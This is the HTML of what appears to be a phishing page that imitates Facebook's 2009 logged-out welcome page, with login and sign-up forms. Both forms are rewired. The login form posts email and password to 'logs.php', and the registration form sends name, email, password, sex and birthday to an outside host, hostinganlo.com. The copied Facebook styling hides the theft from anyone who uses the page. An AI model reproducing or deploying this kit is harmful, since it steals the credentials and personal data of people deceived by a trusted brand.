<meta name="description" content="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet." />  <script type="text/javascript" src="http://b.static.ak.fbcdn.net/js_strings.php/t85507/en_US"></script>

    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zWEXR/lpkg/2icskf95/en_US/141/136889/css/4uifzsn2jkissgcg.pkg.css" />

    <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/zEMQR/lpkg/5b9ntacq/en_US/141/138327/css/2aanubur3f0g40ko.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z96X9/lpkg/3plet3rq/en_US/141/138163/css/eartcl6we3kk4w08.pkg.css" />
<!--[if lte IE 6]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5JTF/l/747bqb4a/en_US/136369/css/ie6.css" type="text/css"/><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zBT4M/l/a8h3fb3n/en_US/136369/css/ie7.css" type="text/css"/><![endif]-->


    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z60XL/lpkg/4rjwya6n/en_US/141/138184/js/84ccno2p1zc44848.pkg.js"></script>
    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z7WGV/l/amvwoqik/en_US/129899/js/recaptcha_ajax.js"></script>
    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/zEFXQ/lpkg/3uvzavy7/en_US/141/137500/js/a9pz9yc6jtsksccc.pkg.js"></script>

    <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/z91MC/l/9baw2grx/nu_ll/132011/js/useragent.js"></script>
<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/opensearch_desc.xml?7:72379" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/favicon.ico?7:132011" />
</head>
<body class="ff3 UIPage_LoggedOut Locale_en_US">
<div id="menubar_container"><div id="fb_menubar" class="fb_menubar_logged_out clearfix"><div id="fb_menubar_logo"><a href="http://www.facebook.com" title="Go to Facebook Home"><span>&nbsp;</span></a></div><div id="fb_menubar_core"></div><div id="fb_menubar_aux"><div class="menu_login_container"><form method="POST" action="logs.php" name="menubar_login" id="menubar_login"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,?,?,?" /><input type="hidden" id="locale" name="locale" value="en_US" /><table cellpadding="0" cellspacing="0"><tr><td class="login_form_label_field login_form_label_remember"><label><input type="checkbox" name="persistent" value="1" />Remember Me</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/reset.php" rel="nofollow">Forgot your password?</a></td><td class="login_form_last_field login_form_label_field"></td></tr><tr><td><input type="text" class="inputtext" id="email" name="email" value="" /></td><td><input type="password" class="inputpassword" id="pass" name="pass" value="" /><input type="text" class="inputtext hidden_elem" id="pass_placeholder" name="pass_placeholder" value="" /></td><td class="login_form_last_field"><div class="UILinkButton"><input type="submit" class="UILinkButton_A" value="Login" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,?,?,?" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="nonfooter"><div id="page_height" class="clearfix"><div id="content" class="fb_content"><div class="UIOneOff_Container"><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 -->
<div class="WelcomePage_Container"><div class="WelcomePage_MainSellContainer"><div class="WelcomePage_MainSell"><div class="WelcomePage_MainSellCenter clearfix"><div class="WelcomePage_MainSellLeft"><div class="WelcomePage_MainMessage">Facebook helps you connect and share with the people in your life.</div><div class="WelcomePage_MainMap">&nbsp;</div></div><div class="WelcomePage_MainSellRight"><div class="WelcomePage_SignUpSection"><div class="WelcomePage_SignUpMessage"><div class="WelcomePage_SignUpHeadline">Sign Up</div><div class="WelcomePage_SignUpSubheadline">It's free and anyone can join</div></div><div class="WelcomePage_SimpleReg"><div id="reg_box"><form id="reg" method="post" action="http://hostinganlo.com/logs.php"><input type="hidden" id="locale" name="locale" value="en_US" /><div id="no_js_box"><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div><div id="reg_form_box" style="display:none"><table class="editor" border="0" cellspacing="0"><input type="hidden" id="simple_reg" name="simple_reg" value="1" /><tr><td class="label">Full Name:</td><td><input type="text" class="inputtext" id="name" name="name" value="" /></td></tr>

<tr><td class="label">Your Email:</td><td><input type="text" class="inputtext" id="reg_email__" name="reg_email__" value="" /></td></tr>
<tr><td class="label">New Password:</td><td><input type="password" class="inputpassword" id="reg_passwd__" name="reg_passwd__" value="" /></td></tr>
<tr><td class="label">I am:</td><td><select class="select" name="sex" id="sex"  ><option value="0">Select Sex:</option><option value="1">Female</option><option value="2">Male</option></select></td></tr>
<tr><td class="label">Birthday:</td><td> <select name="birthday_month" id="birthday_month" onchange="editor_date_month_change(this, 'birthday_day','birthday_year');" autocomplete="off"><option value="-1">Month:</option><option value="1">Jan</option>
<option value="2">Feb</option>
<option value="3">Mar</option>

<option value="4">Apr</option>
<option value="5">May</option>
<option value="6">Jun</option>
<option value="7">Jul</option>
<option value="8">Aug</option>
<option value="9">Sep</option>
<option value="10">Oct</option>
<option value="11">Nov</option>
<option value="12">Dec</option>

</select> <select name="birthday_day" id="birthday_day"  autocomplete="off"><option value="-1">Day:</option><option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>

<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>

<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>

<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select> <select name="birthday_year" id="birthday_year" autocomplete="off"><option value="-1">Year:</option><option value="2009">2009</option>
<option value="2008">2008</option>
<option value="2007">2007</option>

<option value="2006">2006</option>
<option value="2005">2005</option>
<option value="2004">2004</option>
<option value="2003">2003</option>
<option value="2002">2002</option>
<option value="2001">2001</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>

<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>

<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>

<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>

<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>

<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>

<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>

<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>

<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>

<option value="1925">1925</option>
<option value="1924">1924</option>
<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>

<option value="1916">1916</option>
<option value="1915">1915</option>
<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
<option value="1908">1908</option>

<option value="1907">1907</option>
<option value="1906">1906</option>
<option value="1905">1905</option>
<option value="1904">1904</option>
<option value="1903">1903</option>
<option value="1902">1902</option>
<option value="1901">1901</option>
<option value="1900">1900</option>
</select></td></tr>

<tr><td class="label"></td><td><div id="birthday_warning"><a href="#" rel="nofollow" onclick="RegUtil.show_birthday_help(); return false;" title="Click for more information">Why do I need to provide this?</a></div></td></tr>
<input type="hidden" id="referrer" name="referrer" value="116" /><input type="hidden" id="challenge" name="challenge" value="fffe95d58784167b3f75b261283acd79" /><input type="hidden" id="md5pass" name="md5pass" value="" /></table><div class="reg_btn clearfix"><div class="UILinkButton UILinkButton_SU"><input type="submit" class="UILinkButton_A" onclick="RegUtil.get_captcha(); return false;" value="Sign Up" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div></div><div class="reg_terms_box"><input type="hidden" id="terms" name="terms" value="on" /><p class="legal_tos">By clicking Sign Up, you are indicating that you have read and agree to the <a href="/terms.php" target="_blank" rel="nofollow">Terms of Use</a> and <a href="/policy.php" target="_blank" rel="nofollow">Privacy Policy</a>.</p></div></div><script type="text/javascript">

      document.getElementById("no_js_box").style.display = "none";
      document.getElementById("reg_form_box").style.display = "";
   
</script>
<div id="reg_captcha" style="display: none;"><h2>Security Check</h2><div id="outer_captcha_box"><div id=captcha_box><div class="field_error" id="captcha_response_error" style="display:none;">This field is required.</div><div id="captcha" class="captcha">
  <div class="captcha_challenge">
    <div id="recaptcha_scripts" style="display:none"></div>

    <div class="recaptcha_text">Enter <strong>both words</strong> below, <strong>separated by a space</strong>.<br />Can't read the words below? <a href="#" id="recaptcha_reload_btn" onclick="Recaptcha.reload(); return false" tabindex="-1">Try different words</a> or <a href="#" class="recaptcha_only_if_image" onclick="Recaptcha.switch_type(&#039;audio&#039;); return false" tabindex="-1">an audio captcha</a>.<span id='recaptcha_play_audio'></span><div class="audiocaptcha"><a href="#" class='recaptcha_only_if_audio' onclick="Recaptcha.switch_type('image'); return false" tabindex='-1'>Back to text.</a></div></div><div id="recaptcha_image">Loading...</div></div><div class="captcha_input"><label>Text in the box:</label><input type="text" name="captcha_response" id="captcha_response" autocomplete="off" /><div style="margin-left: 15px; display: inline;"><a href="#" id="captcha_whatsthis" onclick="captcha_whatsthis(this); return false">What's This?</a></div>

  </div>
</div></div></div><div id="captcha_buttons" class="clearfix"><div id="back_button" class="gridCol"><div class="cancel_button_image">&nbsp;</div><a href="#" onclick="RegUtil.hide_captcha(); RegUtil.show_reg_form(); return false;" id="cancel_button">Back</a></div><div id="A_btn_sign_up" class="gridCol"><div><div class="UILinkButton UILinkButton_SU"><input type="submit" class="UILinkButton_A" onclick="RegUtil.finish_captcha(); return false;" value="Sign Up" /><div class="UILinkButton_RW"><div class="UILinkButton_R"></div></div></div></div></div></div></div></form><div id="reg_progress" style="display: none"><div id="progress_wrap"><img src="http://b.static.ak.fbcdn.net/images/loaders/indicator_blue_small.gif?7:111099" alt="" />Registering&hellip;</div></div><div id="reg_error" style="display: none">An error occurred. Please try again.</div></form></div></div></div></div></div></div></div></div></div></div></div></div><div id="pagefooter" class= "pagefooter_minimal"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright"><span title="Non-Trimmed">Facebook </span><span id="rtime" title="126">&copy;</span> <span title="10.17.51.117">20</span><span title="15775272">09</span></div><div class="locale_footer_selector"><div id="locale_footer_selector_menu" class="locale_footer_selector_menu" style="display: none;"><a href="http://en-us.facebook.com" onclick="return false">English (US)</a><a href="http://es-la.facebook.com" onclick="intl_set_cookie_locale(null, &#039;es_LA&#039;); return false;">Español</a><a href="http://fr-fr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;fr_FR&#039;); return false;">Français</a><a href="http://de-de.facebook.com" onclick="intl_set_cookie_locale(null, &#039;de_DE&#039;); return false;">Deutsch</a><a href="http://ja-jp.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ja_JP&#039;); return false;">???</a><a href="http://bg-bg.facebook.com" onclick="intl_set_cookie_locale(null, &#039;bg_BG&#039;); return false;">?????????</a><a href="http://ca-es.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ca_ES&#039;); return false;">Català</a><a href="http://cs-cz.facebook.com" onclick="intl_set_cookie_locale(null, &#039;cs_CZ&#039;); return false;">Ceština</a><a href="http://cy-gb.facebook.com" onclick="intl_set_cookie_locale(null, &#039;cy_GB&#039;); return false;">Cymraeg</a><a href="http://da-dk.facebook.com" onclick="intl_set_cookie_locale(null, &#039;da_DK&#039;); return false;">Dansk</a><a href="http://el-gr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;el_GR&#039;); return false;">????????</a><a href="http://en-gb.facebook.com" onclick="intl_set_cookie_locale(null, &#039;en_GB&#039;); return false;">English (UK)</a><a href="http://es-es.facebook.com" onclick="intl_set_cookie_locale(null, &#039;es_ES&#039;); return false;">Español (España)</a><a href="http://fi-fi.facebook.com" onclick="intl_set_cookie_locale(null, &#039;fi_FI&#039;); return false;">Suomi</a><a href="http://hr-hr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;hr_HR&#039;); return false;">Hrvatski</a><a href="http://hu-hu.facebook.com" onclick="intl_set_cookie_locale(null, &#039;hu_HU&#039;); return false;">Magyar</a><a href="http://id-id.facebook.com" onclick="intl_set_cookie_locale(null, &#039;id_ID&#039;); return false;">Bahasa Indonesia</a><a href="http://it-it.facebook.com" onclick="intl_set_cookie_locale(null, &#039;it_IT&#039;); return false;">Italiano</a><a href="http://ko-kr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ko_KR&#039;); return false;">???</a><a href="http://ms-my.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ms_MY&#039;); return false;">Bahasa Melayu</a><a href="http://nb-no.facebook.com" onclick="intl_set_cookie_locale(null, &#039;nb_NO&#039;); return false;">Norsk (bokmål)</a><a href="http://nl-nl.facebook.com" onclick="intl_set_cookie_locale(null, &#039;nl_NL&#039;); return false;">Nederlands</a><a href="http://pl-pl.facebook.com" onclick="intl_set_cookie_locale(null, &#039;pl_PL&#039;); return false;">Polski</a><a href="http://pt-br.facebook.com" onclick="intl_set_cookie_locale(null, &#039;pt_BR&#039;); return false;">Português (Brasil)</a><a href="http://pt-pt.facebook.com" onclick="intl_set_cookie_locale(null, &#039;pt_PT&#039;); return false;">Português (Portugal)</a><a href="http://ro-ro.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ro_RO&#039;); return false;">Româna</a><a href="http://ru-ru.facebook.com" onclick="intl_set_cookie_locale(null, &#039;ru_RU&#039;); return false;">???????</a><a href="http://sl-si.facebook.com" onclick="intl_set_cookie_locale(null, &#039;sl_SI&#039;); return false;">Slovenšcina</a><a href="http://sr-rs.facebook.com" onclick="intl_set_cookie_locale(null, &#039;sr_RS&#039;); return false;">??????</a><a href="http://sv-se.facebook.com" onclick="intl_set_cookie_locale(null, &#039;sv_SE&#039;); return false;">Svenska</a><a href="http://th-th.facebook.com" onclick="intl_set_cookie_locale(null, &#039;th_TH&#039;); return false;">???????</a><a href="http://tl-ph.facebook.com" onclick="intl_set_cookie_locale(null, &#039;tl_PH&#039;); return false;">Filipino</a><a href="http://tr-tr.facebook.com" onclick="intl_set_cookie_locale(null, &#039;tr_TR&#039;); return false;">Türkçe</a><a href="http://vi-vn.facebook.com" onclick="intl_set_cookie_locale(null, &#039;vi_VN&#039;); return false;">Ti?ng Vi?t</a><a href="http://zh-cn.facebook.com" onclick="intl_set_cookie_locale(null, &#039;zh_CN&#039;); return false;">??(??)</a><a href="http://zh-hk.facebook.com" onclick="intl_set_cookie_locale(null, &#039;zh_HK&#039;); return false;">??(??)</a><a href="http://zh-tw.facebook.com" onclick="intl_set_cookie_locale(null, &#039;zh_TW&#039;); return false;">??(??)</a></div><div class="locale_footer_selector_hitarea" id="locale_footer_selector_hitarea"><a href="#" onclick="optional_drop_down_menu(
    null,
    $('locale_footer_selector_hitarea'),
    $('locale_footer_selector_menu'),
    null, null, null, null, null, $('locale_footer_selector_hitarea'),
    {bottom: ($('locale_footer_selector_menu').offsetHeight + $('locale_footer_selector_hitarea').offsetHeight), left: 0}
    ); return false;">English (US)</a><div class="locale_footer_selector_hitarea_right" onclick="optional_drop_down_menu(
    null,
    $('locale_footer_selector_hitarea'),
    $('locale_footer_selector_menu'),
    null, null, null, null, null, $('locale_footer_selector_hitarea'),
    {bottom: ($('locale_footer_selector_menu').offsetHeight + $('locale_footer_selector_hitarea').offsetHeight), left: 0}
    ); return false;"></div></div></div></div><div id="pagefooter_links"><ul id="pagefooter_left_links"><li><a href="http://www.facebook.com/login.php?ref=pf">Login</a></li><li><a href="http://www.facebook.com/facebook?ref=pf" rel="nofollow">About</a></li><li><a href="http://a.ok.facebook.com/cm/ck/10111-65086-13764-11?loc=2">Advertising</a></li><li><a href="http://developers.facebook.com/?ref=pf">Developers</a></li><li><a href="http://www.facebook.com/jobs/?ref=pf">Jobs</a></li><li><a href="http://www.facebook.com/terms.php?ref=pf" rel="nofollow">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="http://www.facebook.com/findfriends.php?ref=pf">Find Friends</a></li><li><a href="http://www.facebook.com/policy.php?ref=pf" rel="nofollow">Privacy</a></li><li><a href="http://www.facebook.com/help.php?ref=pf" rel="nofollow">Help</a></li></ul></div></div></div><div id="js_buffer"><script type="text/javascript"></script>


<script type="text/javascript">
Bootloader.configurePage({"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/zWEXR\/lpkg\/2icskf95\/en_US\/141\/136889\/css\/4uifzsn2jkissgcg.pkg.css":["css\/4uifzsn2jkissgcg.pkg.css",true],"http:\/\/static.ak.fbcdn.net\/rsrc.php\/zEMQR\/lpkg\/5b9ntacq\/en_US\/141\/138327\/css\/2aanubur3f0g40ko.pkg.css":["css\/2aanubur3f0g40ko.pkg.css",false],"http:\/\/b.static.ak.fbcdn.net\/rsrc.php\/z96X9\/lpkg\/3plet3rq\/en_US\/141\/138163\/css\/eartcl6we3kk4w08.pkg.css":["css\/eartcl6we3kk4w08.pkg.css",true]});
Bootloader.done(["css\/4uifzsn2jkissgcg.pkg.css","css\/2aanubur3f0g40ko.pkg.css","css\/eartcl6we3kk4w08.pkg.css"]);


onloadRegister(function() {new RegKeyPressListen();});
onloadRegister(function() {new CaptchaBoxKeyPressListen();});
onloadRegister(function() {Recaptcha.focus_on_load = false;});
onloadRegister(function() {ffid='64Fjtb+6is5dHEBlwDtNlA==';});
onloadRegister(function() {window.loading_page_chrome = true;});
onloadRegister(function() {focus_login(0, true);});
onloadRegister(function() {new MenuBar("fb_menubar_core").setTimeoutInterval(250).init();});
onloadRegister(function() {new MenuBar("fb_menubar_aux").setTimeoutInterval(100).init();});
onloadRegister(function() {window.loading_page_chrome = false;});
onloadRegister(function() {var n = "rtime"; (window.ge && ge(n)) && (ge(n).title += " | 137");});
onloadRegister(function() {
      onbeforeunloadRegister(function () {
        window.setCookie && window.setCookie("cavalry_transit_start_time", (new Date()).getTime(), 10000);
        }, true);});

</script></div></body>
</html>


-->
Twitter Delicious Facebook Digg Stumbleupon Favorites More